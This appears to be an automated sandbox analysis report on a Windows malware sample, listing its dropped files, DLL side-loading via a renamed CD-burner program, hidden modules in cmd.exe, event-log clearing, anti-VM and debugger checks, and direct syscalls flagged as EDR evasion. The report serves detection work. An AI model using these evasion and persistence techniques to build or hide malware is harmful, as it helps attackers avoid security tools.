Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	File created: C:\Users\user\AppData\Roaming\TaskManage\StarBurn.dll	Jump to dropped file
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\msvcr100.dll	Jump to dropped file
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\StarBurn.dll	Jump to dropped file
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\QtCore4.dll	Jump to dropped file
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\msvcp100.dll	Jump to dropped file
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	File created: C:\Users\user\AppData\Roaming\TaskManage\QtXml4.dll	Jump to dropped file
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	File created: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Jump to dropped file
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	File created: C:\Users\user\AppData\Roaming\TaskManage\QtCore4.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\fffwkwbrsb	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\cooisyadg	Jump to dropped file
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	File created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Jump to dropped file

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\Fondue.dll	Jump to dropped file
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\QtXml4.dll	Jump to dropped file
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Jump to dropped file
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\QtNetwork4.dll	Jump to dropped file
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\QtGui4.dll	Jump to dropped file
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\msvcr100.dll	Jump to dropped file
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\StarBurn.dll	Jump to dropped file
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\QtCore4.dll	Jump to dropped file
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\msvcp100.dll	Jump to dropped file
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	File created: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\fffwkwbrsb			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\cooisyadg			Jump to dropped file

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB43AA1 _StartService_@12,lstrlenW,GlobalAlloc,WideCharToMultiByte,StartServiceA,MultiByteToWideChar,GlobalFree,

2_2_5BB43AA1

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\FFFWKWBRSB
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\COOISYADG

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB3DE09 _ClearEventLog_@8,SetLastError,newMultiByteFromWideChar,ClearEventLogA,GlobalFree,

2_2_5BB3DE09

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	API/Special instruction interceptor: Address: 6D317C44
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	API/Special instruction interceptor: Address: 6D317C44
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	API/Special instruction interceptor: Address: 6D317945
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 6D313B54
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	API/Special instruction interceptor: Address: 6BD97C44
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	API/Special instruction interceptor: Address: 6BD97945
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 6BD93B54

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Code function: _EnumServicesStatus_@32,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,EnumServicesStatusA,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,

2_2_5BB42F59

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Dropped PE file which has not been started: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\Fondue.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cooisyadg	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fffwkwbrsb	Jump to dropped file

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Evaded block: after key decision

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Evasive API call chain: GetLocalTime,DecisionNodes

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

API coverage: 4.5 %

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe TID: 7384	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 3848	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 5040	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 5856	Thread sleep time: -120000s >= -30000s

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009CFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 009CFF61h	1_2_009CFEC6
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009CFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 009CFF5Ah	1_2_009CFEC6
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00BAFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 00BAFF61h	2_2_00BAFEC6
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00BAFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 00BAFF5Ah	2_2_00BAFEC6

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_00993CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	1_2_00993CC4
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009D4440 FindFirstFileW,FindClose,	1_2_009D4440
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009C7B87 FindFirstFileExW,	1_2_009C7B87
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009A9B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	1_2_009A9B43
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00BB4440 FindFirstFileW,FindClose,	2_2_00BB4440
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00BA7B87 FindFirstFileExW,	2_2_00BA7B87
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00B89B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	2_2_00B89B43
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00B73CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	2_2_00B73CC4
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_5BB3D32E _FindFirstFileEx_@24,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,	2_2_5BB3D32E
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_5BB3D43A _FindFirstFile_@8,SetLastError,memset,newMultiByteFromWideChar,FindFirstFileA,MultiByteToWideChar,MultiByteToWideChar,GlobalFree,	2_2_5BB3D43A

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB3AFDD _GetLogicalDriveStrings_@8,SetLastError,newMultiByteFromWideCharSize,GetLogicalDriveStringsA,ConvertMultiSZNameToW,GlobalFree,

2_2_5BB3AFDD

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 1_2_009D97A5 VirtualQuery,GetSystemInfo,

1_2_009D97A5

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Thread delayed: delay time: 30000

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: VMware
Source: RescueCDBurner.exe, 00000003.00000002.1665235439.000000006CE3F000.00000008.00000001.01000000.0000000D.sdmp	Binary or memory string: l.?AVQEmulationPaintEngine@@0/zl
Source: cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: RescueCDBurner.exe, 00000003.00000003.1643300295.000000000A93E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: [ed'ee.?AVQEmulationPaintEngine@@0/
Source: cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: RescueCDBurner.exe, 00000004.00000002.1724650438.000000006BD7F000.00000008.00000001.01000000.00000017.sdmp	Binary or memory string: k.?AVQEmulationPaintEngine@@0/nk
Source: cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2476651604.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2467681465.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW*
Source: RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: <&version=&md5=&newsize=&registercode=&registertime=&langStr=&fname=&lname=&email=&activecode=action=wbrb\\.\PhysicalDrive0VMwareb71710ea1f7bf1b2
Source: RescueCDBurner.exe, 00000003.00000003.1643300295.000000000A93E000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1665235439.000000006CE3F000.00000008.00000001.01000000.0000000D.sdmp, RescueCDBurner.exe, 00000004.00000002.1724650438.000000006BD7F000.00000008.00000001.01000000.00000017.sdmp	Binary or memory string: .?AVQEmulationPaintEngine@@

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 1_2_009BE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_009BE88A

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,

2_2_5BB3CB21

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009C48D8 mov eax, dword ptr fs:[00000030h]		1_2_009C48D8
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00BA48D8 mov eax, dword ptr fs:[00000030h]		2_2_00BA48D8

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 1_2_0099394F GetProcessHeap,RtlAllocateHeap,

1_2_0099394F

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009BE3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_009BE3D8
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009BE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_009BE88A
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009BE9DC SetUnhandledExceptionFilter,	1_2_009BE9DC
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009C3C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_009C3C76
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00B9E3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00B9E3D8
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00B9E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00B9E88A
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00B9E9DC SetUnhandledExceptionFilter,	2_2_00B9E9DC
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00BA3C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00BA3C76
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Code function: 3_2_6C2A09A6 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	3_2_6C2A09A6
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6BB07FC2 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	4_2_6BB07FC2

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FC51072	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FD76D98	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FB6ACA7	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FCD9C73	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryValueKey: Direct from: 0x14011D93E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtSetInformationProcess: Direct from: 0x7FF72FC09496	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtCreateThreadEx: Direct from: 0x7FF72FD23324	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtSetInformationProcess: Direct from: 0x7FF72FBF8E5D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadVirtualMemory: Direct from: 0x7FF72FCC552D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtClose: Indirect: 0x14012000F
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FB735D2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FCF7E95	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadVirtualMemory: Direct from: 0x7FF72FCD37A6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FB66F6B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FFBCB7626A1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FCA1E48	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FBBF709	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FCE71E7	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryInformationProcess: Direct from: 0x7FF72FBFCB90	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryValueKey: Direct from: 0x7FF72FC263B7	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FB76355	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FB83AFC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtSetInformationProcess: Direct from: 0x7FF72FD25120	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtDelayExecution: Direct from: 0x7FF72FCEA57E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtClose: Direct from: 0x7FF72FD75B8E
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x14011D808	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FC1BCC0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryValueKey: Direct from: 0x7FF72FC26DE3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadVirtualMemory: Direct from: 0x7FF72FCCA5AB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FCD0A7D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadVirtualMemory: Direct from: 0x7FF72FCCA355	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtCreateFile: Direct from: 0x7FF72FC0352F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FB6E65D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtSetInformationProcess: Direct from: 0x7FF72FCC4987	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtClose: Direct from: 0x7FF72FC55F50
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FC0EEB6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtCreateThreadEx: Direct from: 0x7FF72FB63FB0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FCC8ADD	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadVirtualMemory: Direct from: 0x7FF72FCC5A4D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryInformationProcess: Direct from: 0x7FF72FC08418	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtDelayExecution: Direct from: 0x7FF72FCF9C9C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtMapViewOfSection: Direct from: 0x7FF72FD7696A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryInformationProcess: Direct from: 0x7FF72FCD33DF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtClose: Direct from: 0x7FF72FD77FEB
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtClose: Direct from: 0x7FF72FC26CD3
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtEnumerateKey: Direct from: 0x7FF72FD7890F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadVirtualMemory: Direct from: 0x7FF72FCCA520	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FCCE7C5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FCCA9B6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryValueKey: Direct from: 0x7FF72FC27E48	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtCreateFile: Direct from: 0x7FF72FD73A6A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtSetInformationThread: Direct from: 0x7FF72FD809CE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FB6A692	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	NtQuerySystemInformation: Direct from: 0x774563E1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtTerminateProcess: Direct from: 0x7FF72FC075ED	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtClose: Direct from: 0x7FF72FD77FFF
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FCCCCA7	Jump to behavior
